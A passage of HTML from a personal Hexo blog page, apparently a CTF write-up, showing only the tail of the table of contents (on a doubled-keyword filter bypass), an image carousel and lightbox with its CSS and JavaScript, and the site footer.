Flag</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%80%E7%BB%88-Flag"><span class="nav-number">1.4.</span> <span class="nav-text">最终 Flag</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93"><span class="nav-number">1.5.</span> <span class="nav-text">知识点总结</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87%E5%8E%9F%E7%90%86"><span class="nav-number">1.5.1.</span> <span class="nav-text">双写绕过原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E8%AF%8D%E5%AF%B9%E6%95%B0%E6%8D%AE%E5%AD%97%E5%85%B8%E7%9A%84%E5%BD%B1%E5%93%8D"><span class="nav-number">1.5.2.</span> <span class="nav-text">过滤词对数据字典的影响</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zhaochoudecat"
      src="/images/saber.jpg">
  <p class="site-author-name" itemprop="name">zhaochoudecat</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">33</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


<div class="saber-gallery motion-element">
  <div class="saber-gallery-container" id="saberGallery">
    <div class="saber-gallery-track">
      <img class="saber-gallery-img" src="/images/blue_saber.png" alt="Blue Saber" data-index="0">
      <img class="saber-gallery-img" src="/images/daily_saber.png" alt="Daily Saber" data-index="1">
      <img class="saber-gallery-img" src="/images/dark_saber.png" alt="Dark Saber" data-index="2">
    </div>
    <button class="saber-gallery-arrow saber-gallery-prev" id="saberPrev" aria-label="上一张">
      <i class="fa fa-chevron-left"></i>
    </button>
    <button class="saber-gallery-arrow saber-gallery-next" id="saberNext" aria-label="下一张">
      <i class="fa fa-chevron-right"></i>
    </button>
    <div class="saber-gallery-dots">
      <span class="saber-gallery-dot active"></span>
      <span class="saber-gallery-dot"></span>
      <span class="saber-gallery-dot"></span>
    </div>
  </div>
</div>

<div class="saber-lightbox" id="saberLightbox">
  <div class="saber-lightbox-overlay"></div>
  <button class="saber-lightbox-close" id="saberLightboxClose" aria-label="关闭">
    <i class="fa fa-times"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-prev" id="saberLightboxPrev" aria-label="上一张">
    <i class="fa fa-chevron-left"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-next" id="saberLightboxNext" aria-label="下一张">
    <i class="fa fa-chevron-right"></i>
  </button>
  <div class="saber-lightbox-content">
    <img class="saber-lightbox-img" id="saberLightboxImg" src="" alt="">
  </div>
  <div class="saber-lightbox-counter" id="saberLightboxCounter"></div>
</div>

<style>
.saber-gallery {
  margin-top: 15px;
  text-align: center;
}
.saber-gallery-container {
  position: relative;
  width: 100%;
  height: 280px;
  overflow: hidden;
  border-radius: 8px;
  cursor: pointer;
  user-select: none;
  -webkit-user-select: none;
}
.saber-gallery-container:active {
  cursor: pointer;
}
.saber-gallery-track {
  display: flex;
  height: 100%;
  transition: transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  will-change: transform;
}
.saber-gallery-img {
  flex-shrink: 0;
  width: 100%;
  height: 100%;
  object-fit: contain;
  object-position: center;
  pointer-events: none;
}
.saber-gallery-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 32px;
  height: 32px;
  border: none;
  border-radius: 50%;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  font-size: 14px;
  cursor: pointer;
  opacity: 0;
  transition: opacity 0.3s ease, background 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
  z-index: 2;
}
.saber-gallery-container:hover .saber-gallery-arrow {
  opacity: 1;
}
.saber-gallery-arrow:hover {
  background: rgba(0, 0, 0, 0.7);
}
.saber-gallery-arrow.disabled {
  opacity: 0.2 !important;
  cursor: not-allowed;
}
.saber-gallery-prev {
  left: 8px;
}
.saber-gallery-next {
  right: 8px;
}
.saber-gallery-dots {
  position: absolute;
  bottom: 10px;
  left: 50%;
  transform: translateX(-50%);
  display: flex;
  gap: 6px;
  z-index: 2;
}
.saber-gallery-dot {
  width: 6px;
  height: 6px;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.5);
  transition: background 0.3s ease, transform 0.3s ease;
  cursor: pointer;
}
.saber-gallery-dot.active {
  background: rgba(255, 255, 255, 0.95);
  transform: scale(1.3);
}

/* Lightbox Styles */
.saber-lightbox {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: 9999;
  display: none;
  opacity: 0;
  transition: opacity 0.3s ease;
}
.saber-lightbox.active {
  display: flex;
  opacity: 1;
}
.saber-lightbox-overlay {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.92);
  cursor: pointer;
}
.saber-lightbox-content {
  position: relative;
  z-index: 2;
  margin: auto;
  max-width: 90vw;
  max-height: 90vh;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-img {
  max-width: 100%;
  max-height: 90vh;
  object-fit: contain;
  border-radius: 4px;
  transform: scale(0.8);
  transition: transform 0.3s cubic-bezier(0.25, 0.46, 0.45, 0.94);
}
.saber-lightbox.active .saber-lightbox-img {
  transform: scale(1);
}
.saber-lightbox-close {
  position: absolute;
  top: 20px;
  right: 30px;
  width: 40px;
  height: 40px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 18px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, transform 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-close:hover {
  background: rgba(255, 255, 255, 0.3);
  transform: rotate(90deg);
}
.saber-lightbox-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 50px;
  height: 50px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 20px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, opacity 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-arrow:hover {
  background: rgba(255, 255, 255, 0.3);
}
.saber-lightbox-arrow.disabled {
  opacity: 0.2;
  cursor: not-allowed;
}
.saber-lightbox-prev {
  left: 20px;
}
.saber-lightbox-next {
  right: 20px;
}
.saber-lightbox-counter {
  position: absolute;
  bottom: 20px;
  left: 50%;
  transform: translateX(-50%);
  color: rgba(255, 255, 255, 0.8);
  font-size: 14px;
  z-index: 3;
  letter-spacing: 2px;
}

@media (max-width: 768px) {
  .saber-lightbox-arrow {
    width: 40px;
    height: 40px;
    font-size: 16px;
  }
  .saber-lightbox-prev {
    left: 10px;
  }
  .saber-lightbox-next {
    right: 10px;
  }
  .saber-lightbox-close {
    top: 10px;
    right: 15px;
    width: 36px;
    height: 36px;
    font-size: 16px;
  }
}
</style>

<script>
(function() {
  // Gallery Logic
  var container = document.getElementById('saberGallery');
  var track = container.querySelector('.saber-gallery-track');
  var images = container.querySelectorAll('.saber-gallery-img');
  var dots = container.querySelectorAll('.saber-gallery-dot');
  var prevBtn = document.getElementById('saberPrev');
  var nextBtn = document.getElementById('saberNext');
  var current = 0;
  var total = images.length;
  var autoInterval = 15000;
  var timer = null;

  function goTo(index) {
    if (index < 0) index = 0;
    if (index >= total) index = total - 1;
    current = index;
    track.style.transform = 'translateX(-' + (current * 100) + '%)';
    dots.forEach(function(dot, i) {
      dot.classList.toggle('active', i === current);
    });
    updateArrows();
  }

  function updateArrows() {
    prevBtn.classList.toggle('disabled', current === 0);
    nextBtn.classList.toggle('disabled', current === total - 1);
  }

  function next() {
    if (current < total - 1) {
      goTo(current + 1);
    }
  }

  function prev() {
    if (current > 0) {
      goTo(current - 1);
    }
  }

  function startAuto() {
    timer = setInterval(function() {
      if (current < total - 1) {
        goTo(current + 1);
      } else {
        goTo(0);
      }
    }, autoInterval);
  }

  function stopAuto() {
    clearInterval(timer);
  }

  prevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    prev();
    startAuto();
  });

  nextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    next();
    startAuto();
  });

  dots.forEach(function(dot, i) {
    dot.addEventListener('click', function(e) {
      e.stopPropagation();
      stopAuto();
      goTo(i);
      startAuto();
    });
  });

  // Touch swipe support
  var startX = 0;
  var startY = 0;
  var isDragging = false;
  var currentTranslate = 0;
  var prevTranslate = 0;

  container.addEventListener('touchstart', function(e) {
    startX = e.touches[0].clientX;
    startY = e.touches[0].clientY;
    isDragging = true;
    stopAuto();
    track.style.transition = 'none';
  }, { passive: true });

  container.addEventListener('touchmove', function(e) {
    if (!isDragging) return;
    var diffX = e.touches[0].clientX - startX;
    var diffY = e.touches[0].clientY - startY;
    if (Math.abs(diffX) > Math.abs(diffY)) {
      currentTranslate = prevTranslate + diffX;
      track.style.transform = 'translateX(' + currentTranslate + 'px)';
    }
  }, { passive: true });

  container.addEventListener('touchend', function(e) {
    if (!isDragging) return;
    isDragging = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.changedTouches[0].clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  // Mouse drag support
  var mouseDown = false;
  container.addEventListener('mousedown', function(e) {
    mouseDown = true;
    startX = e.clientX;
    stopAuto();
    track.style.transition = 'none';
    e.preventDefault();
  });

  container.addEventListener('mousemove', function(e) {
    if (!mouseDown) return;
    var diffX = e.clientX - startX;
    currentTranslate = prevTranslate + diffX;
    track.style.transform = 'translateX(' + currentTranslate + 'px)';
  });

  container.addEventListener('mouseup', function(e) {
    if (!mouseDown) return;
    mouseDown = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  container.addEventListener('mouseleave', function() {
    if (mouseDown) {
      mouseDown = false;
      track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
      goTo(current);
      prevTranslate = -(current * container.offsetWidth);
      startAuto();
    }
  });

  window.addEventListener('resize', function() {
    prevTranslate = -(current * container.offsetWidth);
  });

  // Lightbox Logic
  var lightbox = document.getElementById('saberLightbox');
  var lightboxImg = document.getElementById('saberLightboxImg');
  var lightboxClose = document.getElementById('saberLightboxClose');
  var lightboxPrevBtn = document.getElementById('saberLightboxPrev');
  var lightboxNextBtn = document.getElementById('saberLightboxNext');
  var lightboxCounter = document.getElementById('saberLightboxCounter');
  var lightboxOverlay = lightbox.querySelector('.saber-lightbox-overlay');
  var lightboxCurrent = 0;
  var imgSources = Array.from(images).map(function(img) { return img.src; });

  function openLightbox(index) {
    lightboxCurrent = index;
    lightboxImg.src = imgSources[lightboxCurrent];
    updateLightboxCounter();
    updateLightboxArrows();
    lightbox.style.display = 'flex';
    document.body.style.overflow = 'hidden';
    // Force reflow
    lightbox.offsetHeight;
    lightbox.classList.add('active');
    stopAuto();
  }

  function closeLightbox() {
    lightbox.classList.remove('active');
    document.body.style.overflow = '';
    setTimeout(function() {
      lightbox.style.display = 'none';
      lightboxImg.src = '';
      startAuto();
    }, 300);
  }

  function updateLightboxCounter() {
    lightboxCounter.textContent = (lightboxCurrent + 1) + ' / ' + total;
  }

  function updateLightboxArrows() {
    lightboxPrevBtn.classList.toggle('disabled', lightboxCurrent === 0);
    lightboxNextBtn.classList.toggle('disabled', lightboxCurrent === total - 1);
  }

  function lightboxGoTo(index) {
    if (index < 0 || index >= total) return;
    lightboxCurrent = index;
    lightboxImg.style.opacity = '0.5';
    setTimeout(function() {
      lightboxImg.src = imgSources[lightboxCurrent];
      lightboxImg.style.opacity = '1';
      updateLightboxCounter();
      updateLightboxArrows();
    }, 150);
  }

  function lightboxNext() {
    if (lightboxCurrent < total - 1) {
      lightboxGoTo(lightboxCurrent + 1);
    }
  }

  function lightboxPrev() {
    if (lightboxCurrent > 0) {
      lightboxGoTo(lightboxCurrent - 1);
    }
  }

  // Click on gallery image to open lightbox
  container.addEventListener('click', function(e) {
    if (e.target.closest('.saber-gallery-arrow') || e.target.closest('.saber-gallery-dots')) return;
    openLightbox(current);
  });

  lightboxClose.addEventListener('click', closeLightbox);
  lightboxOverlay.addEventListener('click', closeLightbox);

  lightboxPrevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxPrev();
  });

  lightboxNextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxNext();
  });

  // Keyboard navigation
  document.addEventListener('keydown', function(e) {
    if (!lightbox.classList.contains('active')) return;
    if (e.key === 'Escape') {
      closeLightbox();
    } else if (e.key === 'ArrowLeft') {
      lightboxPrev();
    } else if (e.key === 'ArrowRight') {
      lightboxNext();
    }
  });

  // Swipe in lightbox
  var lbStartX = 0;
  lightbox.addEventListener('touchstart', function(e) {
    lbStartX = e.touches[0].clientX;
  }, { passive: true });

  lightbox.addEventListener('touchend', function(e) {
    var diffX = e.changedTouches[0].clientX - lbStartX;
    if (Math.abs(diffX) > 80) {
      if (diffX > 0) {
        lightboxPrev();
      } else {
        lightboxNext();
      }
    }
  }, { passive: true });

  // Initialize
  prevTranslate = 0;
  updateArrows();
  startAuto();
})();
</script>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhaochoudecat</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
